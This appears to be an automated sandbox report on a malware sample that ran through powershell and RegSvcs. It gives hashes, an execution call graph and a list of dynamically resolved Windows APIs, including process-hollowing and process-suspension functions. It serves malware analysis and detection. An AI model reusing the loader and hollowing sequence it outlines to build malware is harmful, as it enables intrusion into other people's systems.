                                    Download Yara Rule

                                    Control-flow Graph

                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3267454060.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_7ffd9b950000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a30fd023bcac4febf576f360ead034ba3b5943ba75decb5d04c97f5e5f99a84b
                                    • Instruction ID: 8378d81a0d1b6c23ba5c91048449636eb6f8ebe43cf7c7dd1cde7c0aadad337d
                                    • Opcode Fuzzy Hash: a30fd023bcac4febf576f360ead034ba3b5943ba75decb5d04c97f5e5f99a84b
                                    • Instruction Fuzzy Hash: 8A411722F1EE4E1FFBA897AC14756B873C1EF55A61B1500BBD85EC31E2ED08AD028341

                                    Executed Functions

                                    Function 00007FFD9B982721 Relevance: .4, Instructions: 384COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000017.00000002.2971156207.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_23_2_7ffd9b980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cd60e017b62a8b7b26310452bfd750dfa299dece239fb97ccc826cf0257b9caa
                                    • Instruction ID: 013575c9752518f3e4a4418cadc9c78a08dcb18d30a0c96ad5f83c834df51536
                                    • Opcode Fuzzy Hash: cd60e017b62a8b7b26310452bfd750dfa299dece239fb97ccc826cf0257b9caa
                                    • Instruction Fuzzy Hash: FAC15532B1FE8E1FEBA4EBA848659B57BD1EF55310B0901FED45DC70E3DA29A9018341
                                    Function 00007FFD9B8B3418 Relevance: .1, Instructions: 107COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000017.00000002.2958666018.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_23_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b85ccf881ab4f70b2f64ae7eccbe0d46dbfcc948a0742cf5bee9662f4f647fea
                                    • Instruction ID: 52823b9f283d4d52118657c5908b6e344685c983be99fd378b5a183adc0e76d1
                                    • Opcode Fuzzy Hash: b85ccf881ab4f70b2f64ae7eccbe0d46dbfcc948a0742cf5bee9662f4f647fea
                                    • Instruction Fuzzy Hash: E131C16660E7D54FE7179BA8A8625E13F70EF53274B0A01EBC0C5CB0B3D919294BC7A1
                                    Function 00007FFD9B9828C9 Relevance: .1, Instructions: 64COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000017.00000002.2971156207.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_23_2_7ffd9b980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b095c4ffbc31fcbf7db4ca05e8190fd3da82edecec5f59965a3a43763c032884
                                    • Instruction ID: 83b66d27cbdaaae012fb8bb2c33d4d84fb9a46a9f2f4669c704d76b8edceaea7
                                    • Opcode Fuzzy Hash: b095c4ffbc31fcbf7db4ca05e8190fd3da82edecec5f59965a3a43763c032884
                                    • Instruction Fuzzy Hash: 7711C122F1EA8E5FFB64DAD890A06B8B7D1EF58310F5501BED05DD7093DA2AA9418360
                                    Function 00007FFD9B8B33A5 Relevance: .0, Instructions: 49COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000017.00000002.2958666018.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_23_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4e704c2f9787c5482f3ef504e6ed8ef1b0faa200ce0f5ae5831ad015ab4922c7
                                    • Instruction ID: d32098309b1a6811cd9a6615f808be0c1925d9f0fe18ef4f00fb21267d00c869
                                    • Opcode Fuzzy Hash: 4e704c2f9787c5482f3ef504e6ed8ef1b0faa200ce0f5ae5831ad015ab4922c7
                                    • Instruction Fuzzy Hash: 0401A73120CB0C4FD748EF0CE451AA6B3E0FB89320F10056EE58AC36A1DA32E881CB41

                                    Execution Graph

                                    Execution Coverage:1%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:4.6%
                                    Total number of Nodes:479
                                    Total number of Limit Nodes:7
                                    execution_graph 46504 434887 46505 434893 ___FrameUnwindToState 46504->46505 46530 434596 46505->46530 46507 43489a 46509 4348c3 46507->46509 46825 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 46507->46825 46517 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46509->46517 46826 444251 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 46509->46826 46511 4348dc 46513 4348e2 ___FrameUnwindToState 46511->46513 46827 4441f5 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 46511->46827 46514 434962 46541 434b14 46514->46541 46517->46514 46828 4433e7 35 API calls 5 library calls 46517->46828 46525 43498e 46526 434997 46525->46526 46829 4433c2 28 API calls _abort 46525->46829 46830 43470d 13 API calls 2 library calls 46526->46830 46531 43459f 46530->46531 46831 434c52 IsProcessorFeaturePresent 46531->46831 46533 4345ab 46832 438f31 10 API calls 4 library calls 46533->46832 46535 4345b0 46540 4345b4 46535->46540 46833 4440bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46535->46833 46537 4345bd 46538 4345cb 46537->46538 46834 438f5a 8 API calls 3 library calls 46537->46834 46538->46507 46540->46507 46835 436e90 46541->46835 46544 434968 46545 4441a2 46544->46545 46837 44f059 46545->46837 46547 434971 46550 40e9c5 46547->46550 46548 4441ab 46548->46547 46841 446815 35 API calls 46548->46841 46843 41cb50 LoadLibraryA GetProcAddress 46550->46843 46552 40e9e1 GetModuleFileNameW 46848 40f3c3 46552->46848 46554 40e9fd 46863 4020f6 46554->46863 46557 4020f6 28 API calls 46558 40ea1b 46557->46558 46869 41be1b 46558->46869 46562 40ea2d 46895 401e8d 46562->46895 46564 40ea36 46565 40ea93 46564->46565 46566 40ea49 46564->46566 46901 401e65 22 API calls 46565->46901 46925 40fbb3 95 API calls 46566->46925 46569 40eaa3 46902 401e65 22 API calls 46569->46902 46570 40ea5b 46926 401e65 22 API calls 46570->46926 46572 40ea67 46927 410f37 36 API calls __EH_prolog 46572->46927 46574 40eac2 46903 40531e 28 API calls 46574->46903 46577 40ead1 46904 406383 28 API calls 46577->46904 46578 40ea79 46928 40fb64 77 API calls 46578->46928 46581 40eadd 46905 401fe2 46581->46905 46582 40ea82 46929 40f3b0 70 API calls 46582->46929 46588 401fd8 11 API calls 46590 40eefb 46588->46590 46589 401fd8 11 API calls 46591 40eafb 46589->46591 46820 4432f6 GetModuleHandleW 46590->46820 46917 401e65 22 API calls 46591->46917 46593 40eb04 46918 401fc0 28 API calls 46593->46918 46595 40eb0f 46919 401e65 22 API calls 46595->46919 46597 40eb28 46920 401e65 22 API calls 46597->46920 46599 40eb43 46600 40ebae 46599->46600 46930 406c1e 28 API calls 46599->46930 46921 401e65 22 API calls 46600->46921 46603 40eb70 46604 401fe2 28 API calls 46603->46604 46605 40eb7c 46604->46605 46608 401fd8 11 API calls 46605->46608 46606 40ec02 46922 40d069 46606->46922 46607 40ebbb 46607->46606 46932 413549 RegOpenKeyExA RegQueryValueExA RegCloseKey 46607->46932 46610 40eb85 46608->46610 46931 413549 RegOpenKeyExA RegQueryValueExA RegCloseKey 46610->46931 46611 40ec08 46612 40ea8b 46611->46612 46934 41b2c3 33 API calls 46611->46934 46612->46588 46615 40eba4 46615->46600 46617 40f34f 46615->46617 47012 4139a9 30 API calls 46617->47012 46618 40ec23 46621 40ec76 46618->46621 46935 407716 RegOpenKeyExA RegQueryValueExA RegCloseKey 46618->46935 46619 40ebe6 46619->46606 46933 4139a9 30 API calls 46619->46933 46940 401e65 22 API calls 46621->46940 46625 40ec7f 46633 40ec90 46625->46633 46634 40ec8b 46625->46634 46626 40ec3e 46628 40ec42 46626->46628 46629 40ec4c 46626->46629 46627 40f365 47013 412475 65 API calls ___scrt_get_show_window_mode 46627->47013 46936 407738 30 API calls 46628->46936 46938 401e65 22 API calls 46629->46938 46942 401e65 22 API calls 46633->46942 46941 407755 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 46634->46941 46635 40ec47 46937 407260 97 API calls 46635->46937 46640 40f37f 47015 413a23 RegOpenKeyExW RegDeleteValueW 46640->47015 46641 40ec99 46943 41bc5e 28 API calls 46641->46943 46643 40ec55 46643->46621 46648 40ec71 46643->46648 46645 40eca4 46944 401f13 28 API calls 46645->46944 46646 40f392 47016 401f09 11 API calls 46646->47016 46939 407260 97 API calls 46648->46939 46651 40ecaf 46945 401f09 11 API calls 46651->46945 46652 40f39c 47017 401f09 11 API calls 46652->47017 46654 40ecb8 46946 401e65 22 API calls 46654->46946 46657 40f3a5 47018 40dd42 27 API calls 46657->47018 46658 40ecc1 46947 401e65 22 API calls 46658->46947 46660 40f3aa 47019 414f2a 167 API calls 46660->47019 46664 40ecdb 46948 401e65 22 API calls 46664->46948 46666 40ecf5 46949 401e65 22 API calls 46666->46949 46668 40ed80 46671 40ed8a 46668->46671 46676 40ef06 ___scrt_get_show_window_mode 46668->46676 46669 40ed0e 46669->46668 46950 401e65 22 API calls 46669->46950 46672 40ed93 46671->46672 46678 40ee0f 46671->46678 46956 401e65 22 API calls 46672->46956 46674 40ed9c 46957 401e65 22 API calls 46674->46957 46675 40ed23 _wcslen 46675->46668 46951 401e65 22 API calls 46675->46951 46967 4136f8 RegOpenKeyExA RegQueryValueExA RegCloseKey 46676->46967 46702 40ee0a ___scrt_get_show_window_mode 46678->46702 46680 40edae 46958 401e65 22 API calls 46680->46958 46681 40ed3e 46952 401e65 22 API calls 46681->46952 46684 40edc0 46959 401e65 22 API calls 46684->46959 46686 40ed53 46953 40da34 31 API calls 46686->46953 46687 40ef51 46968 401e65 22 API calls 46687->46968 46691 40ede9 46960 401e65 22 API calls 46691->46960 46692 40ef76 46969 402093 28 API calls 46692->46969 46693 40ed66 46954 401f13 28 API calls 46693->46954 46695 40ed72 46955 401f09 11 API calls 46695->46955 46699 40edfa 46961 40cdf9 45 API calls _wcslen 46699->46961 46700 40ef88 46970 41376f 14 API calls 46700->46970 46701 40ed7b 46701->46668 46702->46678 46962 413947 31 API calls 46702->46962 46706 40ef9e 46971 401e65 22 API calls 46706->46971 46707 40eea3 ctype 46963 401e65 22 API calls 46707->46963 46709 40efaa 46972 43baac 39 API calls _swprintf 46709->46972 46712 40efb7 46715 40efe4 46712->46715 46973 41cd9b 86 API calls ___scrt_get_show_window_mode 46712->46973 46713 40eeba 46713->46687 46964 401e65 22 API calls 46713->46964 46974 402093 28 API calls 46715->46974 46716 40eed7 46965 41bc5e 28 API calls 46716->46965 46720 40efc8 CreateThread 46720->46715 47088 41d45d 10 API calls 46720->47088 46721 40eff9 46975 402093 28 API calls 46721->46975 46722 40eee3 46966 40f474 103 API calls 46722->46966 46725 40f008 46976 41b4ef 79 API calls 46725->46976 46726 40eee8 46726->46687 46728 40eeef 46726->46728 46728->46612 46729 40f00d 46977 401e65 22 API calls 46729->46977 46731 40f019 46978 401e65 22 API calls 46731->46978 46733 40f02b 46979 401e65 22 API calls 46733->46979 46735 40f04b 46980 43baac 39 API calls _swprintf 46735->46980 46737 40f058 46981 401e65 22 API calls 46737->46981 46739 40f063 46982 401e65 22 API calls 46739->46982 46741 40f074 46983 401e65 22 API calls 46741->46983 46743 40f089 46984 401e65 22 API calls 46743->46984 46745 40f09a 46746 40f0a1 StrToIntA 46745->46746 46985 409de4 169 API calls _wcslen 46746->46985 46748 40f0b3 46986 401e65 22 API calls 46748->46986 46750 40f101 46989 401e65 22 API calls 46750->46989 46751 40f0bc 46751->46750 46987 4344ea 22 API calls 3 library calls 46751->46987 46754 40f0d1 46988 401e65 22 API calls 46754->46988 46756 40f0e4 46757 40f0eb CreateThread 46756->46757 46757->46750 47090 419fb4 102 API calls __EH_prolog 46757->47090 46758 40f159 46992 401e65 22 API calls 46758->46992 46759 40f111 46759->46758 46990 4344ea 22 API calls 3 library calls 46759->46990 46762 40f126 46991 401e65 22 API calls 46762->46991 46764 40f138 46769 40f13f CreateThread 46764->46769 46765 40f1cc 46998 401e65 22 API calls 46765->46998 46766 40f162 46766->46765 46993 401e65 22 API calls 46766->46993 46769->46758 47089 419fb4 102 API calls __EH_prolog 46769->47089 46770 40f17e 46994 401e65 22 API calls 46770->46994 46771 40f1d5 46772 40f21a 46771->46772 46999 401e65 22 API calls 46771->46999 47003 41b60d 79 API calls 46772->47003 46776 40f193 46995 40d9e8 31 API calls 46776->46995 46777 40f223 47004 401f13 28 API calls 46777->47004 46778 40f1ea 47000 401e65 22 API calls 46778->47000 46780 40f22e 47005 401f09 11 API calls 46780->47005 46784 40f1a6 46996 401f13 28 API calls 46784->46996 46786 40f237 CreateThread 46791 40f264 46786->46791 46792 40f258 CreateThread 46786->46792 47091 40f7a7 120 API calls 46786->47091 46787 40f1ff 47001 43baac 39 API calls _swprintf 46787->47001 46788 40f1b2 46997 401f09 11 API calls 46788->46997 46793 40f279 46791->46793 46794 40f26d CreateThread 46791->46794 46792->46791 47092 4120f7 137 API calls 46792->47092 46798 40f2cc 46793->46798 47006 402093 28 API calls 46793->47006 46794->46793 47093 4126db 38 API calls ___scrt_get_show_window_mode 46794->47093 46796 40f1bb CreateThread 46796->46765 47094 401be9 49 API calls 46796->47094 46797 40f20c 47002 40c162 7 API calls 46797->47002 47008 4134ff RegOpenKeyExA RegQueryValueExA RegCloseKey 46798->47008 46801 40f29c 47007 4052fd 28 API calls 46801->47007 46804 40f2e4 46804->46657 47009 41bc5e 28 API calls 46804->47009 46809 40f2fd 47010 41361b 31 API calls 46809->47010 46814 40f313 47011 401f09 11 API calls 46814->47011 46816 40f346 DeleteFileW 46817 40f34d 46816->46817 46818 40f31e 46816->46818 47014 41bc5e 28 API calls 46817->47014 46818->46816 46818->46817 46819 40f334 Sleep 46818->46819 46819->46818 46821 434984 46820->46821 46821->46525 46822 44341f 46821->46822 47096 44319c 46822->47096 46825->46507 46826->46511 46827->46517 46828->46514 46829->46526 46830->46513 46831->46533 46832->46535 46833->46537 46834->46540 46836 434b27 GetStartupInfoW 46835->46836 46836->46544 46838 44f06b 46837->46838 46839 44f062 46837->46839 46838->46548 46842 44ef58 48 API calls 4 library calls 46839->46842 46841->46548 46842->46838 46844 41cb8f LoadLibraryA GetProcAddress 46843->46844 46845 41cb7f GetModuleHandleA GetProcAddress 46843->46845 46846 41cbb8 44 API calls 46844->46846 46847 41cba8 LoadLibraryA GetProcAddress 46844->46847 46845->46844 46846->46552 46847->46846 47020 41b4a8 FindResourceA 46848->47020 46852 40f3ed ctype 47030 4020b7 46852->47030 46855 401fe2 28 API calls 46856 40f413 46855->46856 46857 401fd8 11 API calls 46856->46857 46858 40f41c 46857->46858 46859 43bd51 _Yarn 21 API calls 46858->46859 46860 40f42d ctype 46859->46860 47036 406dd8 46860->47036 46862 40f460 46862->46554 46864 40210c 46863->46864 46865 4023ce 11 API calls 46864->46865 46866 402126 46865->46866 46867 402569 28 API calls 46866->46867 46868 402134 46867->46868 46868->46557 47073 4020df 46869->47073 46871 401fd8 11 API calls 46872 41bed0 46871->46872 46873 401fd8 11 API calls 46872->46873 46875 41bed8 46873->46875 46874 41bea0 47079 4041a2 28 API calls 46874->47079 46878 401fd8 11 API calls 46875->46878 46880 40ea24 46878->46880 46879 41beac 46881 401fe2 28 API calls 46879->46881 46891 40fb17 46880->46891 46883 41beb5 46881->46883 46882 401fe2 28 API calls 46887 41be2e 46882->46887 46884 401fd8 11 API calls 46883->46884 46886 41bebd 46884->46886 46885 401fd8 11 API calls 46885->46887 47080 41ce34 28 API calls 46886->47080 46887->46874 46887->46882 46887->46885 46890 41be9e 46887->46890 47077 4041a2 28 API calls 46887->47077 47078 41ce34 28 API calls 46887->47078 46890->46871 46892 40fb23 46891->46892 46894 40fb2a 46891->46894 47081 402163 11 API calls 46892->47081 46894->46562 46896 402163 46895->46896 46897 40219f 46896->46897 47082 402730 11 API calls 46896->47082 46897->46564 46899 402184 47083 402712 11 API calls std::_Deallocate 46899->47083 46901->46569 46902->46574 46903->46577 46904->46581 46906 401ff1 46905->46906 46907 402039 46905->46907 46908 4023ce 11 API calls 46906->46908 46914 401fd8 46907->46914 46909 401ffa 46908->46909 46910 40203c 46909->46910 46911 402015 46909->46911 47085 40267a 11 API calls 46910->47085 47084 403098 28 API calls 46911->47084 46915 4023ce 11 API calls 46914->46915 46916 401fe1 46915->46916 46916->46589 46917->46593 46918->46595 46919->46597 46920->46599 46921->46607 47086 401fab 46922->47086 46924 40d073 CreateMutexA GetLastError 46924->46611 46925->46570 46926->46572 46927->46578 46928->46582 46930->46603 46931->46615 46932->46619 46933->46606 46934->46618 46935->46626 46936->46635 46937->46629 46938->46643 46939->46621 46940->46625 46941->46633 46942->46641 46943->46645 46944->46651 46945->46654 46946->46658 46947->46664 46948->46666 46949->46669 46950->46675 46951->46681 46952->46686 46953->46693 46954->46695 46955->46701 46956->46674 46957->46680 46958->46684 46959->46691 46960->46699 46961->46702 46962->46707 46963->46713 46964->46716 46965->46722 46966->46726 46967->46687 46968->46692 46969->46700 46970->46706 46971->46709 46972->46712 46973->46720 46974->46721 46975->46725 46976->46729 46977->46731 46978->46733 46979->46735 46980->46737 46981->46739 46982->46741 46983->46743 46984->46745 46985->46748 46986->46751 46987->46754 46988->46756 46989->46759 46990->46762 46991->46764 46992->46766 46993->46770 46994->46776 46995->46784 46996->46788 46997->46796 46998->46771 46999->46778 47000->46787 47001->46797 47002->46772 47003->46777 47004->46780 47005->46786 47006->46801 47008->46804 47009->46809 47010->46814 47011->46818 47012->46627 47014->46640 47015->46646 47016->46652 47017->46657 47018->46660 47087 41ad17 104 API calls 47019->47087 47021 41b4c5 LoadResource LockResource SizeofResource 47020->47021 47022 40f3de 47020->47022 47021->47022 47023 43bd51 47022->47023 47028 446137 ___crtLCMapStringA 47023->47028 47024 446175 47040 4405dd 20 API calls _free 47024->47040 47025 446160 RtlAllocateHeap 47027 446173 47025->47027 47025->47028 47027->46852 47028->47024 47028->47025 47039 442f80 7 API calls 2 library calls 47028->47039 47031 4020bf 47030->47031 47041 4023ce 47031->47041 47033 4020ca 47045 40250a 47033->47045 47035 4020d9 47035->46855 47037 4020b7 28 API calls 47036->47037 47038 406dec 47037->47038 47038->46862 47039->47028 47040->47027 47042 402428 47041->47042 47043 4023d8 47041->47043 47042->47033 47043->47042 47052 4027a7 11 API calls std::_Deallocate 47043->47052 47046 40251a 47045->47046 47047 402520 47046->47047 47048 402535 47046->47048 47053 402569 47047->47053 47063 4028e8 28 API calls 47048->47063 47051 402533 47051->47035 47052->47042 47064 402888 47053->47064 47055 40257d 47056 402592 47055->47056 47057 4025a7 47055->47057 47069 402a34 22 API calls 47056->47069 47071 4028e8 28 API calls 47057->47071 47060 40259b 47070 4029da 22 API calls 47060->47070 47062 4025a5 47062->47051 47063->47051 47065 402890 47064->47065 47066 402898 47065->47066 47072 402ca3 22 API calls 47065->47072 47066->47055 47069->47060 47070->47062 47071->47062 47074 4020e7 47073->47074 47075 4023ce 11 API calls 47074->47075 47076 4020f2 47075->47076 47076->46887 47077->46887 47078->46887 47079->46879 47080->46890 47081->46894 47082->46899 47083->46897 47084->46907 47085->46907 47095 4127ee 61 API calls 47092->47095 47097 4431a8 _abort 47096->47097 47098 4431c0 47097->47098 47100 4432f6 _abort GetModuleHandleW 47097->47100 47118 445888 EnterCriticalSection 47098->47118 47101 4431b4 47100->47101 47101->47098 47130 44333a GetModuleHandleExW 47101->47130 47104 4431c8 47106 44323d 47104->47106 47116 443266 47104->47116 47138 443f50 20 API calls _abort 47104->47138 47115 443255 47106->47115 47139 4441f5 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 47106->47139 47107 443283 47122 4432b5 47107->47122 47108 4432af 47141 457729 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 47108->47141 47140 4441f5 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 47115->47140 47119 4432a6 47116->47119 47118->47104 47142 4458d0 LeaveCriticalSection 47119->47142 47121 44327f 47121->47107 47121->47108 47143 448cc9 47122->47143 47125 4432e3 47127 44333a _abort 8 API calls 47125->47127 47126 4432c3 GetPEB 47126->47125 47128 4432d3 GetCurrentProcess TerminateProcess 47126->47128 47129 4432eb ExitProcess 47127->47129 47128->47125 47131 443364 GetProcAddress 47130->47131 47132 443387 47130->47132 47133 443379 47131->47133 47134 443396 47132->47134 47135 44338d FreeLibrary 47132->47135 47133->47132 47136 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 47134->47136 47135->47134 47137 4433a0 47136->47137 47137->47098 47138->47106 47139->47115 47140->47116 47142->47121 47144 448cee 47143->47144 47148 448ce4 47143->47148 47149 4484ca 47144->47149 47147 4432bf 47147->47125 47147->47126 47156 434fcb 47148->47156 47150 4484fa 47149->47150 47153 4484f6 47149->47153 47150->47148 47151 44851a 47151->47150 47154 448526 GetProcAddress 47151->47154 47153->47150 47153->47151 47163 448566 47153->47163 47155 448536 __crt_fast_encode_pointer 47154->47155 47155->47150 47157 434fd6 IsProcessorFeaturePresent 47156->47157 47158 434fd4 47156->47158 47160 435018 47157->47160 47158->47147 47170 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47160->47170 47162 4350fb 47162->47147 47164 448587 LoadLibraryExW 47163->47164 47165 44857c 47163->47165 47166 4485a4 GetLastError 47164->47166 47169 4485bc 47164->47169 47165->47153 47167 4485af LoadLibraryExW 47166->47167 47166->47169 47167->47169 47168 4485d3 FreeLibrary 47168->47165 47169->47165 47169->47168 47170->47162 47171 404e26 WaitForSingleObject 47172 404e40 SetEvent CloseHandle 47171->47172 47173 404e57 closesocket 47171->47173 47174 404ed8 47172->47174 47175 404e64 47173->47175 47176 404e7a 47175->47176 47184 4050e4 83 API calls 47175->47184 47178 404e8c WaitForSingleObject 47176->47178 47179 404ece SetEvent CloseHandle 47176->47179 47185 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47178->47185 47179->47174 47181 404e9b SetEvent WaitForSingleObject 47186 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47181->47186 47183 404eb3 SetEvent CloseHandle CloseHandle 47183->47179 47184->47176 47185->47181 47186->47183

                                    Executed Functions

                                    Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                    • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                    • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                    • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                    • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                    • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                    • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                    • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                    • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                    • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                    • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                    • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                    • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad$HandleModule
                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                    • API String ID: 4236061018-3687161714
                                    • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                    • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
